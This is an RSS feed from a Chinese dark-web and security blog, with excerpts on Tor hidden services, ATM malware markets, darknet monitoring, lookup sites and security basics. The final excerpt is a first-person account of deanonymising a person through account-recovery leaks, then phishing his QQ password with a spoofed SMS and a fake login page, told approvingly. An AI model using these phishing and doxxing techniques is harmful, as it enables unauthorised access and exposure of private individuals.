<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>信息安全 on 暗网探秘</title>
    <link>https://anwangtanmi.github.io/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/</link>
    <description>Recent content in 信息安全 on 暗网探秘</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>zh-CN</language>
    <lastBuildDate>Wed, 11 Sep 2019 22:19:17 +0800</lastBuildDate>
    <atom:link href="https://anwangtanmi.github.io/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>在CentOS7下使用Tor 创建匿名服务和匿名网站</title>
      <link>https://anwangtanmi.github.io/posts/4d3d60bba76a66eba1f1a9d2555f7806/</link>
      <pubDate>Wed, 11 Sep 2019 22:19:17 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/4d3d60bba76a66eba1f1a9d2555f7806/</guid>
      <description>原文链接：&#xA;https://blog.byhi.org/archives/f9abf4e9.html 原文&#xA;科普下什么是暗网 暗网（英语：Dark web）是存在于黑暗网络、覆盖网络上的万维网内容，只能用特殊软体、特殊授权、或对电脑做特殊设定才能访问。暗网构成了深网的一小部分，深网网络没有被网络搜索引擎索引，有时“深网”这一术语被错误地用于指代暗网。&#xA;构成暗网的黑暗网络包括F2F的小型点对点网络以及由公共组织和个人运营的大型流行网络，如Tor、自由网、I2P和Riffle。暗网用户基于常规网络未加密的性质将其称为明网。Tor暗网可以称为洋葱区域（onionland），其使用网络顶级域后缀.onion和洋葱路由的流量匿名化技术。 —《维基百科-暗网》词条的解释&#xA;Deep web／Dark web／Darknet 的区别 深网”(Deep web) 是指服务器上可通过标准的网络浏览器和连接方法访问的页面和服务，但主流搜索引擎不会收录这些页面和服务。搜索引擎之所以不会收录深网，通常是因为网站或服务的配置错误、拒绝爬虫爬取信息、需要付费查看、需要注册查看或其他内容访问限制。&#xA;“暗网”(Dark web) 是深网中相对较小的一部分，与被故意隐藏的 Web 服务和页面有关。仅使用标准浏览器无法直接访问这些服务和页面，必须依靠使用覆盖网络 (Overlay Network)；而这种网络需要特定访问权限、代理配置、专用软件或特殊网络协议。&#xA;“黑暗网络”(Darknet) 是在网络层访问受限的框架，例如 Tor 或 I2P。私有 VPN 和网状网络 (Mesh Network) 也属于这个类别。通过这些框架的网络流量会被屏蔽。当进行数据传输时，系统只会显示您连接的黑暗网络以及您传输了多少数据，而不一定会显示您访问的网站或所涉及数据的内容。与之相反的是，直接与明网（Clean Net）或与未加密的表网服务和深网服务交互。在这种情况下，您与所请求资源之间的互联网服务提供商 (ISP) 和网络运营商可以看到您传输的流量内容。&#xA;安装 这里使用centos7作为服务器&#xA;首先扩展yum源 这里推荐下面两个yum源，建议服务器初始化的时候就是用这两个yum源作为软件的扩展&#xA;1 2 rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm 然后安装nginx 1 yum -y install nginx 安装tor 1 yum -y install tor 配置 先配置nginx 打开nginx的配置文件,让nginx监听8080端口&#xA;1 2 3 4 5 6 7 8 server { listen 8080; location / { root /www/tor; index index.</description>
    </item>
    <item>
      <title>一周新闻纵览：工信部组织召开综合整治骚扰电话专项行动；智能锁百万指纹泄密；4G不会降速5G网速会更快</title>
      <link>https://anwangtanmi.github.io/posts/1256fc41a3a34ecf3c323858bdd2668a/</link>
      <pubDate>Mon, 26 Aug 2019 14:22:59 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/1256fc41a3a34ecf3c323858bdd2668a/</guid>
      <description> 不知不觉&#xA;又到了周五了&#xA;伴随着一周的小尾巴&#xA;开始我们今天的一周IT新闻盘点吧&#xA;我们曾如此期盼外界的认可，到最后才知道：世界是自己的，与他人毫无关系。—杨绛&#xA;1&#xA;网络黑产无孔不入&#xA;随着社会进入数字经济时代，网络黑产不再是散兵游勇式的单打独斗，已经演化成具有专业分工、链条化运作特征的产业。提及网络黑产，就绕不开暗网，暗网复杂隐蔽，承载着大量的信息资源且鱼龙混杂，成为助长网络犯罪的重要工具。&#xA;2&#xA;工信部组织召开综合整治骚扰电话专项行动&#xA;8月15日，工信部信息通信管理局在北京组织召开综合整治骚扰电话专项行动工作会，进一步加大骚扰电话源头治理力度，深入推进骚扰电话综合整治。最高人民法院、最高人民检察院、教育部、公安部、司法部等十三部门参加会议。&#xA;3&#xA;智能锁百万指纹泄密，攻击者可进入任何地方！&#xA;近日，研究人员在生物识别公司Suprema的智能锁系统中发现了一个可公开访问的生物识别数据库安全漏洞，能够访问超过100万人的身份验证数据。该数据库超过2780万条记录的数据，包括指纹、面部识别数据，甚至还有员工的个人信息。&#xA;4&#xA;三大运营商回应降速传言 4G不会降速&#xA;近日，有传言称4G网络速度下降，目的是“为了推广50”。对此，记者分别致电三大运营商，相关客服工作人员均对此表示否认，并表示5G速度会更快，没有接到4G会降速的通知。&#xA;对于5G推出了4G是否会降速的疑问，一位客服明确表示，“5G网速会更快，4G不会降速。”他表示，没有接到公司通知。&#xA;独立电信分析师付亮指出，从日常使用来看，4G的下载速率通常在数十兆的量级，20-30Mbps、30-40Mbps的速率均属于正常范围，也较为常见。关于5G推广对4G网速是否会有影响，付亮认为，目前阶段5G非独立组网与4G有共用资源，从这角度看有可能对部分双载波4G+的百兆以上超高网速略有降低，但对普通4G用户来说不会有影响，并不会带来4G降速。&#xA;三大运营商客服昨日回复相关咨询时均表示，用户只需更换一部56手机，不换卡不换号即可接收到56信号。同时运营商目前相应的5G体验包提供免费体验流量。&#xA;5&#xA;数字人民币初露真容：非网络支付或电子钱包&#xA;在日前举行的第三届中国金融四十人伊春论坛上，央行支付结算司副司长穆长春表示，央行下属的数字货币研究所早于2018年就开始了数字货币系统的开发，央行数字货币已是“呼之欲出”。目前，该所已经申请了74项涉及数字货币技术的专利。央行数字货币是基于国家信用、由央行发行的法定数字货币，与比特币等“虚拟货币”有着本质区别。穆长春表示，以往电子支付工具的资金转移必须通过传统银行账户才能完成，而央行数字货币可脱离传统银行账户实现价值转移，使交易环节对账户依赖程度大为降低。&#xA;6&#xA;蓝牙存在泄露隐私风险，你一直开着吗?&#xA;波士顿大学研究人员发现，部分蓝牙设备上，蓝牙通信协议存在的漏洞，会导致个人信息被窃取，允许第三方追踪设备所在位置。Windows 10、ioS、macOS等软件系统以及Apple Watch、Fitbit手环等设备上都存在此漏洞。&#xA;7&#xA;App存隐忧莫让便民利器成扰民工具&#xA;在对上百款App代码进行了“全景扫描”后发现，有超8成App安装包中均含有超出其业务范围的权限代码；有过半数的App含有索取用户通讯录的代码。这意味着，用户对“隐私协议”点下“我同意”的按钮时，也向App敞开了隐私的大门。&#xA;8&#xA;App超半数留索取用户通讯录”后门”&#xA;据报道，109款App中嘀嗒出行、百合婚恋、和包支付、瑞钱包、e代驾、飞嘀打车、中国工商银行、悟空理财、平安好医生、开心消消乐10个App申请的敏感权限最多；83.6%的App含越界代码，中移动旗下的和包支付“越界”严重。&#xA;9&#xA;大量App存在读写用户设备文件等异常行为&#xA;国家互联网应急中心8月13日发布《2019年上半年我国互联网网络安全态势》。这份报告指出，我国移动APP违法违规使用个人信息问题十分突出，大量APP存在探测其他APP或读写用户设备文件等异常行为，对用户的个人信息安全造成潜在安全威胁。&#xA;10&#xA;iOS 12.4系统遭黑客破解 漏洞危及数百万用户&#xA;在最近的一次iOS 12.4系统更新中，苹果公司无意中恢复了在先前版本中修复过的一个漏洞，从而使得当前iOS 12.4版本系统遭到了黑客的破解，继而为众多iPhone用户带来了多年以来唯一一次最新系统的公开越狱机会，而这也将为苹果公司带来一系列的安全风险。 </description>
    </item>
    <item>
      <title>暗网：ATM攻击软件的商品化</title>
      <link>https://anwangtanmi.github.io/posts/1f9a80531be5e3547d055ede6ba2d8c4/</link>
      <pubDate>Tue, 02 Jul 2019 18:21:51 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/1f9a80531be5e3547d055ede6ba2d8c4/</guid>
      <description> 当趋势科技在2015年开始分析地下市场的恶意样本时，发现ATM相关的恶意软件并不常见。在当时，南美洲和俄罗斯的一些犯罪团伙集中研究了ATM机器的工作原理，并制作了专门的软件来攻击它们，此事名噪一时。ATM机器和我们一般使用的Windows环境有很大的不同，攻击者需要了解很多特殊的API接口以及它们是如何与特定的银行应用交互的。&#xA;此后，我们与Europol的欧洲网络犯罪中心（EC3）合作，向公众宣传了针对ATM的不同种类的网络威胁以及发展趋势。接下来我们不停针对ATM所面对的威胁发出自己的声音，并写了一篇文章详细介绍多年来出现的ATM恶意软件家族。&#xA;相关研究：针对ATM的恶意软件：全面了解各种攻击类型&#xA;现如今，在ATM恶意软件领域我们观察到了很多最新的变化，但最重要的一点不是和技术有关：ATM恶意软件已经成为地下网络犯罪论坛的一个共同而显著的特征，它已经是攻击者用来窃取现金的武器库的一部分。ATM恶意软件已经成为一种普通的商品，任何一个投资1000美元的罪犯都可以立即开始攻击ATM。&#xA;值得注意的是，这些恶意软件来自讲俄语的销售商。这当然并不代表南美黑客组织已经停止攻击ATM，而是表示俄罗斯的黑客组织拥有一个更加活跃、繁荣的非法市场，那里的恶意软件需求旺盛。&#xA;ATM恶意软件101：犯罪建议和在线帮助 当你购买网络犯罪产品时，不仅仅会得到恶意软件，通常，这些软件的销售商还会提供使用指导、建议和故障排除指南。&#xA;举个例子，最广为人知的ATM恶意软件之一，Cutlet Maker，详细描述了成功攻击所需的硬件，以及程序的详细使用说明。&#xA;Cutlet Maker软件的主要一部分：对ATM品牌和型号的描述，以及攻击它所需的设备&#xA;除了通用的“用户手册”外，卖家还分享了关于如何在不同环境下进行软件故障排除的建议。以下是本指南引言的翻译：&#xA;“原始手册和第二个手册概述了软件工作所需的所有条件。Tav真的拥有一切。而在这本手册中，我将介绍如何克服有可能出现的困难，这充分结合了我自己的经验。” 我们无法确定这段话中的“Tav”是指恶意软件还是手册的编写者，亦或是该恶意软件的内部名称。这份文档将手册的作者标识为“Bogdan”。&#xA;上图是Cutlet Maker故障排除指南的屏幕截图。作者介绍了ATM机的USB端口位置，以及如何设计一个连接USB电缆和访问内部USB端口的工具。&#xA;这份指南还详细描述了ATM机器的内外部细节。以下是卖家建议的翻译：&#xA;“我们需要的端口位于ATM上方塑料盖的后面，紧贴其后的往往是银行的广告纸。这个盖子通过三点固定，它们分别位于塑料盖的左上侧、中间和右侧。轻轻地撬动工具，避免盖子破裂，然后将其放在ATM的顶部。接下来我们拿出一个手电筒往里照，可以看到了以下画面：”&#xA;以上图片描述了一旦移除内部USB端口的面板，攻击者将看到什么。卖家还提供了一些使用手机的建议，以躲避执法部门的追踪。&#xA;除此教他人如何物理攻击ATM，卖家还会提供一些软件技术支持。例如，如果目标计算机受防病毒程序保护，如何禁用已安装的安全软件。&#xA;“就像禁用Adobe服务一样。我们先进入任务管理器的“Startup”选项卡，取消其开机运行。然后进入防病毒软件文件夹c:/program…/our antivirus/，将.exe的名称更改为任何其他名称。 你现在已关闭防病毒软件，可以从闪存中运行恶意软件了。” 以上这种方法是一种很简单的方法，不适用于更先进的ATM安全解决方案。但是，并不是所有的ATM都使用了最新的安全方案。&#xA;上图主要说明如何禁用防病毒程序。&#xA;案例研究：ATM恶意软件经销商 ATM恶意软件正在成为地下犯罪论坛中的常见产品，它也不再是以前那种奇特或小众的东西了。一个卖家甚至可以提供了多个种类的ATM恶意软件。这些卖家也不是恶意软件的作者，他们基本上都是经销商，从销售中提成的。&#xA;上图为一个地下犯罪论坛的恶意软件列表。&#xA;以上为三个地下犯罪论坛的软件列表，显示同一卖家提供了不同种类的ATM恶意软件。&#xA;在浏览这些犯罪论坛时，我们注意到了一个专门出售ATM恶意软件的经销商，我们决定仔细查看用户的个人资料。M_xxxxx发布了多个帖子，在论坛上兜售许多不同种类的ATM恶意软件。&#xA;根据其买家和其他论坛用户的评论，这个用户似乎不是这些软件的原始作者，只是个经销商。这个人在多个帖子中表示：“我以更低的价格销售相同的软件”。此外，此人还有视频说明，演示恶意软件的工作原理，视频发布在网站Darkvideo上。不过，也有其他论坛用户指责这个卖家销售的软件无效。他旁注中的俄语像是用机器翻译的，这意味着他的母语不是俄罗斯语。&#xA;M_xxxxx的各种ATM恶意软件的价格如下：&#xA;Winpot——1000美元 HelloWorld——1000美元 Annuit Coeptis——500美元 Alice——300美元 Cutlet Maker——200美元 ATM恶意软件或将影响银行安全 在过去两年中，地下犯罪论坛中提供的ATM恶意软件数量显著增加。这种类型的恶意软件过去只专属于知名犯罪团伙，现在正成为一种主流工具，很多人都有购买意向。总而言之，任何有几百美元的犯罪分子都可以攻击ATM了。&#xA;有些恶意软件纯粹是骗局，但另外一些似乎能正常攻击。事实上，我们已经看到不少买家的好评，特别是一些知名的恶意软件，更是广受欢迎。这让人想起银行木马的那段“群雄逐鹿”的时代。&#xA;虽然不少针对ATM的攻击手段还很低级，但不幸的是，这个世界还存在很多无保护的ATM机，可能只有发生大规模的ATM攻击，这种情况才会逐渐改善。&#xA;请记住，随着时间推移，那些未受保护的ATM遭受攻击的风险会疯狂增加。&#xA;本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场：https://nosec.org/home/detail/2740.html 来源：https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/crimeware-for-sale-the-commoditization-of-atm-malware-in-the-cybercriminal-underground?utm_source=trendmicroresearch&amp;amp;utm_medium=smk&amp;amp;utm_campaign=0619_atm </description>
    </item>
    <item>
      <title>企业威胁情报平台建设之暗网监控</title>
      <link>https://anwangtanmi.github.io/posts/570e332107f15bd72d43da31916c3f70/</link>
      <pubDate>Wed, 26 Jun 2019 13:02:08 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/570e332107f15bd72d43da31916c3f70/</guid>
      <description>一、前言&#xA;相信大家对暗网这个概念并不陌生，众所周知，暗网藏着一个暗黑版的交易市场，违法工具、色情交易、毒品交易、枪械信息比比皆是，俨然一个网络犯罪分子聚集的“虎狼之穴”。我们使用Tor浏览器等可以轻松访问暗网中的浅层网，主要是黄赌毒和数据情报信息，如丝绸之路等。&#xA;对于企业而言，往往不免被黑客攻击而被获取大量的数据，而这些数据一般会优先在暗网售卖，如近年来的12306、各大互联网公司等的数据泄露事件。为了及时响应突发的数据泄露事件，企业需要一款实时监控暗网数据泄露的威胁情报平台，用来监控敏感数据泄露、薅羊毛、业务安全风险等事件。&#xA;二、代理服务器搭建&#xA;由于国内网络环境的原因，为了顺利访问暗网，我们需要一台海外服务器，系统版本是ubuntu 18.04(当然其他系统也可以，只是本文会把这个版本的系统作为例子)，同时需要在这台服务器上安装Tor与Privoxy用作访问代理服务器。&#xA;本文的系统版本：&#xA;root@536ef99cab94:/# cat /etc/issue.net Ubuntu 18.04.2 LTS 2.1 整体架构&#xA;从图上可以看到，Privoxy作为一个中转代理，主要是把http协议转socks5协议，而Tor则负责把socks5转Tor协议。所以整个代理访问过程为：&#xA;1.用户输入后缀为onion的地址，由Privoxy暴露的8118端口访问http协议； 2.Privoxy把http协议转发给Tor，Tor获取该网站公钥进行加密，通过Tor通信链路发送信息给Tor节点，由该节点转发请求到.onion网站。 2.2 安装Tor&#xA;可能很多人一开始会直接执行这条命令：sudo apt-get install tor，从这个命令安装的Tor是v2版本的，不支持较新的加密算法，所以导致访问不到某些使用最新加密算法的暗网网址。&#xA;Tor v2到Tor v3的转变主要表现为如下几点：&#xA;1.签名算法从SHA1/DH/RSA1024升级到SHA3/ed25519/curve25519； 2.改进的Tor directory protocol，安全性更高； 3.更好的洋葱地址，换成sha3，可以提高枚举生成一样地址的难度； 4.可拓展的交换协议。 参考官网的安装方法，安装最新版（v3版本）的Tor步骤如下：&#xA;1.在/etc/apt/sources.list添加如下源：&#xA;deb https://deb.torproject.org/torproject.org bionic main deb-src https://deb.torproject.org/torproject.org bionic main 2.添加gpg密钥，执行如下命令：&#xA;curl https://deb.torproject.org/torproject.org/A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89.asc | gpg --import gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - 3.安装Tor：&#xA;apt update apt install tor deb.torproject.org-keyring 4.查看安装好Tor的版本，可知本文安装的Tor版本为0.3.5.8：&#xA;root@536ef99cab94:/# tor -v Jun 18 14:30:43.</description>
    </item>
    <item>
      <title>社工查询网站</title>
      <link>https://anwangtanmi.github.io/posts/3b6dbdb3e10b04e610f549cfde4232ad/</link>
      <pubDate>Fri, 14 Jun 2019 22:40:02 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/3b6dbdb3e10b04e610f549cfde4232ad/</guid>
      <description>shodan https://www.shodan.io/&#xA;zoomeye https://www.zoomeye.org/&#xA;censys https://censys.io/&#xA;pipl https://pipl.com/&#xA;reg007 https://www.reg007.com/&#xA;whois https://www.whois.com/&#xA;dogpile https://www.dogpile.com/&#xA;Yandex https://yandex.com/&#xA;启信宝 https://www.qixin.com/?from=baidusem24&#xA;天眼查 https://www.tianyancha.com/&#xA;爱查 http://www.2cha.com/&#xA;IMEIdb http://www.imeidb.com/&#xA;基站定位 http://www.cellid.cn/&#xA;银行卡号归属地 http://cha.yinhangkadata.com/&#xA;友商发票查询 http://fapiao.youshang.com/</description>
    </item>
    <item>
      <title>使用Tor设置SSH服务器以隐藏Shodan和黑客</title>
      <link>https://anwangtanmi.github.io/posts/533607b0ccb0f53e3e12c78c772161e6/</link>
      <pubDate>Fri, 31 May 2019 16:17:19 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/533607b0ccb0f53e3e12c78c772161e6/</guid>
      <description>内容目录&#xA;前述&#xA;为什么要用Tor设置SSH？&#xA;步骤1：安装Tor&#xA;步骤2：在服务器上创建洋葱服务&#xA;步骤3：验证洋葱服务是否正常（可选）&#xA;步骤4：使SSH服务保密&#xA;步骤5：使用Tor连接到SSH服务器&#xA;步骤6：确保Shodan无法看到SSH服务&#xA;结论&#xA;前述&#xA;下一个libSSH或OpenSSH漏洞利用可能就在眼前。在黑客找到绕过保护服务器的密码的新方法之前，请将您的SSH服务保留在Shodan的数据库之外。&#xA;Shodan被称为“ 黑客的搜索引擎 ”，因为它实际上是一个可搜索的互联网连接设备和服务器数据库。它允许任何人搜索网络摄像头，路由器，服务器，Raspberry Pis，交通信号灯，销售点系统，工业控制系统等等。&#xA;Web工具通过随机迭代现有的每个可能的IP地址（无论是在线还是未使用）并尝试在不同端口上提取服务标志来实现此目的。服务标志通常存储有关正在运行的服务的元数据，例如服务名称，类型和版本号。&#xA;为什么要用Tor设置SSH？&#xA;任何连接互联网的设备都将不可避免地被Shodan和其他数据库（如Censys）扫描。黑客使用这些数据库来定位过时的易受攻击的服务器。即使是经常更新服务器并遵循最佳安全实践的系统管理员也会受到攻击。libSSH认证绕过漏洞是一个很好的例子。&#xA;libSSH vuln允许黑客在没有首先执行身份验证的情况下连接到SSH服务。最完整的最新服务仍然容易受到这种攻击，并使许多服务器和网站面临风险。更重要的是，完全更新的系统仍然暴露于尚未披露的漏洞。目前还不知道有多少未公开的OpenSSH漏洞存在。&#xA;Tor 洋葱服务可以帮助减少暴露。就像使用标准Web浏览器无法访问洋葱网站一样，SSH服务只能配置为允许通过Tor访问。它可以使搜索引擎完全无法访问，像Shodan一样，并且黑客更难以找到。&#xA;步骤1：安装Tor&#xA;我们需要做的第一件事是在虚拟专用服务器（VPS）和客户端计算机上安装Tor。客户端可以是Debian，Ubuntu或Kali系统。MacOS和Windows 10用户可以查看官方Tor Project文档，以便正确安装tor。对于大多数读者来说，SSH服务器很可能是Debian VPS。但是，这可以在Ubuntu桌面或Raspberry Pi上进行设置，适用于那些希望远程访问家中计算机的用户。&#xA;Tor在许多Linux存储库中都可用。在大多数情况下，无法可靠地维护或更新软件包，这意味着可能缺少关键稳定性和安全性更新。此外，匿名软件应始终直接从源（即torproject.org）获取。&#xA;登录到您的SSH服务器并使用以下echo命令将Tor Project的存储库添加到您的APT存储库列表，该命令在Debian中有效。&#xA;~$ echo -e &#34;deb https://deb.torproject.org/torproject.org $(lsb_release -sc) main \ndeb-src https://deb.torproject.org/torproject.org $(lsb_release -sc) main&#34; &amp;gt; /etc/apt/sources.list.d/tor.list 更多阅读，参阅国外课栈新址https://via-dean.com</description>
    </item>
    <item>
      <title>网络安全第三章2</title>
      <link>https://anwangtanmi.github.io/posts/f35e4508d551671ddce11ebdccfdfc18/</link>
      <pubDate>Fri, 12 Apr 2019 11:08:09 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/f35e4508d551671ddce11ebdccfdfc18/</guid>
      <description>目录&#xA;网络安全的基本概念&#xA;APT&#xA;暗网&#xA;网络安全威胁&#xA;网络监听&#xA;口令破解&#xA;拒绝服务攻击&#xA;漏洞攻击&#xA;僵尸网络&#xA;网络钓鱼&#xA;网络欺骗&#xA;网站安全威胁&#xA;社会工程&#xA;部分协议的安全漏洞&#xA;网络安全的基本概念 APT APT( AdvancedPersistentThreat 高级持续性威胁〉&#xA;一般APT 攻击过程可概括为3 个阶段:攻击前准备阶段、攻击入侵阶段和持续攻击阶段，又可细分为5 个步骤：情报收集、防线突破、通道建立、横向渗透、信息收集及外传&#xA;暗网 暗网(深网，不可见网，隐藏网)是指那些存储在网络数据库里、不能通过超链接访问而需要通过动态网页技术访问的资源集合，不属于那些可以被标准搜索引擎索引的表面网络。&#xA;网络安全威胁 网络监听 网络监昕的目的是截获递信的内容，监昕的手段是对协议进行分析。&#xA;一台连接在以太网内的计算机为了能跟其他主机进行通信，需要有网卡支持。网卡有几种接收数据帧的状态，如unicast ， broadcast, multicast, promiscuous 等，Promiscuous 即混杂模式，是指对报文中的硬件地址不加任何检查，全部接收的工作模式&#xA;Sniffer (嗅探器)分析网络的流量，以便找出所关心的网络中潜在的问题。&#xA;交换机能根据数据帧中的目的MAC 地址将数据帧准确地送到目的主机的端口，而不是所有的端口。所以交换式网络环境在一定程度上能抵御Sniffer 攻击。但是在交换式网络上同样会有Sniffer 的攻击。在交换环境中， Sniffer 的简单的做法就是&#xA;伪装成为网关。因为网关是一个网络互联设备，所有发往其他网络上的数据报文都必须由网关来转发出去。&#xA;在无线局域网WLAN 中网络嗅探对信息安全的威胁来自其被动性和非干扰性，运行监听程序的主机在窃听的过程中只是被动的接收网络中传输的信息，它不会主动跟其他的主机交换信息，也不修改在网络中传输的信息包，使得网络嗅探具有很强的隐蔽&#xA;性，往往让网络信息地密变得不容易被发现。&#xA;口令破解 字典文件就是根据南户的各种信息建立一个用户可能使用的口令的列表文件。&#xA;口令攻击类型：字典攻击、强行攻击（暴力？）、词典攻击、口令破解器&#xA;拒绝服务攻击 拒绝服务攻击DoS (DenialofService) 是阻止或拒绝合法使用者存取网络服务器〈一般为Web 、FTP 或邮件服务器)的一种破坏性攻击方式。&#xA;外部用户发动拒绝服务攻击主要有以下几种模式:消耗资源、破坏或更改配置信息、物理破坏或改变网络部件、利用服务程序中的处理错误便服务失效&#xA;服务端口攻击是向开放的服务端口发送大量的数据包，从而耗尽目标主机的资源，使该服务器不能接受合法用户的正常访问。&#xA;服务端口攻击方式：同步包凤暴（ SYNFlooding)、Smurf 攻击结合使用了IP 欺骗和ICMP 回复方法使大量网络数据充斥目标系统、利用TCP/IP 协议实现中的处理程序错误实施拒绝服务攻击&#xA;电子邮件轰炸，过多的邮件会加酣网络连接负担、消耗大量的存储空间。&#xA;低速率拒绝服务攻击(Low-rateDoS) LDoS，，通过周期性地在一个特定的短暂时间间隔内突发性地发送大量攻击数据包，从而降低被攻击端服务性能。&#xA;漏洞攻击 exploit漏洞利用</description>
    </item>
    <item>
      <title>【社工&amp;信息捕获】有个姑娘网恋奔现发现自己被人卖了，跟她见面的是另一个人</title>
      <link>https://anwangtanmi.github.io/posts/59ca98bccac874b4d7406735c9f326ec/</link>
      <pubDate>Fri, 08 Mar 2019 09:56:57 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/59ca98bccac874b4d7406735c9f326ec/</guid>
      <description>大家好，我是凌云&#xA;十多天前，我接到一条线索，原本以为是一件很普通的事，当我追查的时候发现和暗网有牵连，自己不但暴露了还被对方反查到真实身份。&#xA;这件事得从今年的2月10日说起，那天我和平常一样登公众号后台看私信内容。&#xA;有个叫李琴的姑娘连续几天都在给我发信息——在网上谈了一男朋友，聊了一个多月他来见她，发现不是同一个人，还差点被下药。&#xA;我跟李琴说修图太过分也很正常啊，怎么不是一个人了？&#xA;她说不是，刚见面的时候他说话带着一股小沈阳的味道，在网上他给我发语音普通话很正，没带口音的。&#xA;我当时就留了个心眼，以前他跟我说过对西瓜过敏的，我那天故意给他点了杯西瓜汁，他喝了啥事都没有。&#xA;然后他就跟我说让我去酒店陪他放行李，当时我就不敢跟他去了，我跟他说我去个厕所先，然后给我闺蜜发了条信息告诉她现在的情况，在回来的时候我看到他拿着一瓶东西倒我杯子里。&#xA;幸好当时我闺蜜打电话问我啥情况，我就借着这个机会说我还有个朋友要来，我出去门口接她一下，就偷偷跑了。&#xA;我琢磨了一会之后，给李琴留了个微信，让她微信上详细聊。&#xA;很快她加上了我，我问了李琴一些能证明身份的话，以及让她整理一份事件经过、把对方的所有信息发到我邮箱上&#xA;那天晚上，李琴和我说：“他向我坦白了，说把我的信息卖给了另一个男的。”&#xA;听到这，心里一阵无语，这种东西也能卖的吗？&#xA;我的打算是从卖李琴信息的人开始调查，如果有机会的话还要揪出跟她见面的人。&#xA;只要对方有把柄落我手上，自然就能问到我需要的信息。&#xA;而李琴网恋对象的信息，我觉得参杂了很多水分，毕竟刚开始就没打算跟她在一起的，自然给的是假信息，所以我现在要核验哪些信息是真的，哪些是假的。&#xA;0x0x 核验信息 我托在通讯公司上班的朋友查他给李琴的手机号，但我朋友说：“这个手机机主姓名叫陈杰”&#xA;而跟李琴网恋的人叫黄文民，根本不符合，所以他给李琴的姓名是假的。&#xA;后来当我尝试追查微信的时候发现，该微信是从16年就已经注册了&#xA;从一些蜘丝马迹来看，这个号码原来主人应该是中年人使用的&#xA;不然历史头像不会用一盆花作为头像，所以能推断微信号是从号贩子那买来的。&#xA;但很奇怪的是——我追查他留给李琴的QQ号的时候，发现这是一个常用号码，QQ等级和使用时间都是很正常的，并不像他买的微信号那样透露着不对劲。&#xA;难道他会给李琴自己私人的QQ吗？立马去问她这QQ号码是怎么来的&#xA;李琴说是在快见面之前的时候，当时让他陪我打王者，因为我玩的是QQ区的，他玩的是微信区的，不同区的没法一起玩，得加QQ好友才行，然后他一直让我等等，我生气之后他马上给了我一个QQ。&#xA;王者荣耀一共有两大分区，分别是QQ和微信，而它们是不互通的。&#xA;我问李琴：“那他的王者是小号吗”&#xA;不是，他QQ区都打上钻石了&#xA;琢磨了一会之后得出一个大胆的猜测——当时李琴催的急，没时间买新的QQ或者是新号打王者会有新手指引，我就特烦这个指引，站在我的角度去思考，我认为，这个QQ就是他的私人号码&#xA;大胆猜测，小心求证，我去QQ安全中心选择忘记密码，通过密保手机验证看到的这个QQ绑定的手机号是152开头的，而他给李琴的手机号是130开头的，这个QQ还真有可能就是他的私人号码&#xA;综合以上的简单分析，我决定把调查方向转到他QQ上&#xA;0x02猜解手机号 用这个QQ号的邮箱去查了下注册了哪些帐号，我想尝试去猜解出绑定的手机号剩下的数字&#xA;搜索支付宝帐号，有个实名信息叫刘*俊的帐号，很幸运的是这个帐号绑定了手机，在忘记密码的时候选择手机号和银行卡验证拿到了最后两位数的号码。&#xA;想猜解手机号，必须要了解手机号的格式（前三位+四位归属地+随机位）&#xA;我现在还不知道他到底是哪个地区的，他跟李琴说是湖北人，我肯定是不信的，还得自己查。&#xA;检索他这个QQ号在网上遗留的痕迹时，我发现了他的贴吧帐号，没发过帖子，头像也是默认的，但在他关注里看到关注了亳州这个贴吧。&#xA;经验告诉我，他百分之九十五是安徽毫州人，那么现在能确认地区了，剩下就要猜解出剩下的五位手机号了。&#xA;手机号的结构是前三位+四位归属地+随机位，我在网上找了一个全国号码生成器查找安徽移动所有的开头为152的号码，一共有400个&#xA;然后把数据导入到通讯录里一个个筛选QQ的通讯录好友，和头像符合的QQ。&#xA;花了挺长一段时间，终于找到了和他QQ头像昵称符合的了。&#xA;第一轮调查后我知道了他的手机号，姓名和地区，再次整理并且筛选假信息，得到下图。&#xA;目前知道了他叫刘X俊，152的手机号和35开头的QQ都是他的私人号码。&#xA;0x03钓鱼攻击 琢磨了一会之后，着手搭建了一个钓鱼网站，我的计划是利用钓鱼网站去尝试拿到他的QQ号，希望能在他QQ里捕捉到买家的一些线索。&#xA;钓鱼网站搭建完之后去某个短信验证平台上给他手机发了一条106开头的短信，说他的QQ被人多次申诉，现在已经限制部分功能，要想解除得登录下面的链接。&#xA;点开短信的链接会跳转到我搭建的虚假页面中，提示他要登录QQ才可以操作。当他输入QQ帐号和密码之后会提示密码错误，其实这个设置还真有点贱，哈哈哈。&#xA;很快在钓鱼网站后台里看到了他的QQ帐号和密码&#xA;但是在登录他QQ的时候发现有设备锁，用以前的漏洞无法绕过，这时陷入了困境，点了一根烟开始思考该用哪个方法去绕过设备锁。&#xA;0x04入侵邮箱 